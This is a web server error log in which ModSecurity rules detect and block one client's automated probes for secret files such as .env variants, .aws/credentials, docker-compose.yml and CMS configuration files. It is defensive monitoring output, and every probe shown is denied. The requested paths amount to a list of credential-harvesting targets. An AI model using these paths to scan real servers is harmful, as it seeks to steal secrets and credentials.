[Sat Mar 21 04:08:04.579421 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/saas/.env"] [unique_id "ab4LlLVOPlV6sIlrZCplWAAAAAA"]
[Sat Mar 21 04:08:06.404781 2026] [authz_core:error] [pid 2836923] [client 13.54.173.38:55454] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/docker-compose.yml
[Sat Mar 21 04:08:07.311528 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "ab4Ll7VOPlV6sIlrZCplYQAAAAA"]
[Sat Mar 21 04:08:07.311701 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "ab4Ll7VOPlV6sIlrZCplYQAAAAA"]
[Sat Mar 21 04:08:07.311850 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "ab4Ll7VOPlV6sIlrZCplYQAAAAA"]
[Sat Mar 21 04:08:07.606169 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "ab4Ll7VOPlV6sIlrZCplYgAAAAA"]
[Sat Mar 21 04:08:07.606333 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "ab4Ll7VOPlV6sIlrZCplYgAAAAA"]
[Sat Mar 21 04:08:07.606540 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.test"] [unique_id "ab4Ll7VOPlV6sIlrZCplYgAAAAA"]
[Sat Mar 21 04:08:07.900706 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "ab4Ll7VOPlV6sIlrZCplYwAAAAA"]
[Sat Mar 21 04:08:07.900825 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "ab4Ll7VOPlV6sIlrZCplYwAAAAA"]
[Sat Mar 21 04:08:07.901375 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "ab4Ll7VOPlV6sIlrZCplYwAAAAA"]
[Sat Mar 21 04:08:07.901526 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "ab4Ll7VOPlV6sIlrZCplYwAAAAA"]
[Sat Mar 21 04:08:08.195839 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "ab4LmLVOPlV6sIlrZCplZAAAAAA"]
[Sat Mar 21 04:08:08.195944 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "ab4LmLVOPlV6sIlrZCplZAAAAAA"]
[Sat Mar 21 04:08:08.196083 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "ab4LmLVOPlV6sIlrZCplZAAAAAA"]
[Sat Mar 21 04:08:08.196231 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "ab4LmLVOPlV6sIlrZCplZAAAAAA"]
[Sat Mar 21 04:08:09.713975 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod.local"] [unique_id "ab4LmbVOPlV6sIlrZCplaQAAAAA"]
[Sat Mar 21 04:08:09.714167 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod.local"] [unique_id "ab4LmbVOPlV6sIlrZCplaQAAAAA"]
[Sat Mar 21 04:08:09.714362 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod.local"] [unique_id "ab4LmbVOPlV6sIlrZCplaQAAAAA"]
[Sat Mar 21 04:08:10.008538 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/sites/default/settings.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sites/default/settings.php found within REQUEST_FILENAME: /sites/default/settings.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/sites/default/settings.php"] [unique_id "ab4LmrVOPlV6sIlrZCplagAAAAA"]
[Sat Mar 21 04:08:10.008696 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/sites/default/settings.php"] [unique_id "ab4LmrVOPlV6sIlrZCplagAAAAA"]
[Sat Mar 21 04:08:10.008854 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/sites/default/settings.php"] [unique_id "ab4LmrVOPlV6sIlrZCplagAAAAA"]
[Sat Mar 21 04:08:10.303241 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "ab4LmrVOPlV6sIlrZCplawAAAAA"]
[Sat Mar 21 04:08:10.303411 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "ab4LmrVOPlV6sIlrZCplawAAAAA"]
[Sat Mar 21 04:08:10.303571 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "ab4LmrVOPlV6sIlrZCplawAAAAA"]
[Sat Mar 21 04:08:10.904377 2026] [authz_core:error] [pid 2836923] [client 13.54.173.38:55454] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.env.bak
[Sat Mar 21 04:08:11.198836 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.1"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.1"] [unique_id "ab4Lm7VOPlV6sIlrZCplbgAAAAA"]
[Sat Mar 21 04:08:11.198992 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.1"] [unique_id "ab4Lm7VOPlV6sIlrZCplbgAAAAA"]
[Sat Mar 21 04:08:11.199152 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.1"] [unique_id "ab4Lm7VOPlV6sIlrZCplbgAAAAA"]
[Sat Mar 21 04:08:11.493250 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev.local"] [unique_id "ab4Lm7VOPlV6sIlrZCplbwAAAAA"]
[Sat Mar 21 04:08:11.493417 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev.local"] [unique_id "ab4Lm7VOPlV6sIlrZCplbwAAAAA"]
[Sat Mar 21 04:08:11.493564 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.dev.local"] [unique_id "ab4Lm7VOPlV6sIlrZCplbwAAAAA"]
[Sat Mar 21 04:08:12.095998 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "ab4LnLVOPlV6sIlrZCplcQAAAAA"]
[Sat Mar 21 04:08:12.096157 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "ab4LnLVOPlV6sIlrZCplcQAAAAA"]
[Sat Mar 21 04:08:12.096304 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "ab4LnLVOPlV6sIlrZCplcQAAAAA"]
[Sat Mar 21 04:08:12.390698 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/app/etc/local.xml" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /app/etc/local.xml found within REQUEST_FILENAME: /app/etc/local.xml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/app/etc/local.xml"] [unique_id "ab4LnLVOPlV6sIlrZCplcgAAAAA"]
[Sat Mar 21 04:08:12.390876 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/app/etc/local.xml"] [unique_id "ab4LnLVOPlV6sIlrZCplcgAAAAA"]
[Sat Mar 21 04:08:12.391045 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/app/etc/local.xml"] [unique_id "ab4LnLVOPlV6sIlrZCplcgAAAAA"]
[Sat Mar 21 04:08:13.177213 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.remote"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.remote"] [unique_id "ab4LnbVOPlV6sIlrZCpldAAAAAA"]
[Sat Mar 21 04:08:13.177382 2026] [:error] [pid 2836923] [client 13.54.173.38:55454] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.remote"] [unique_id "ab4LnbVOPlV6sIlrZCpldAAAAAA"]
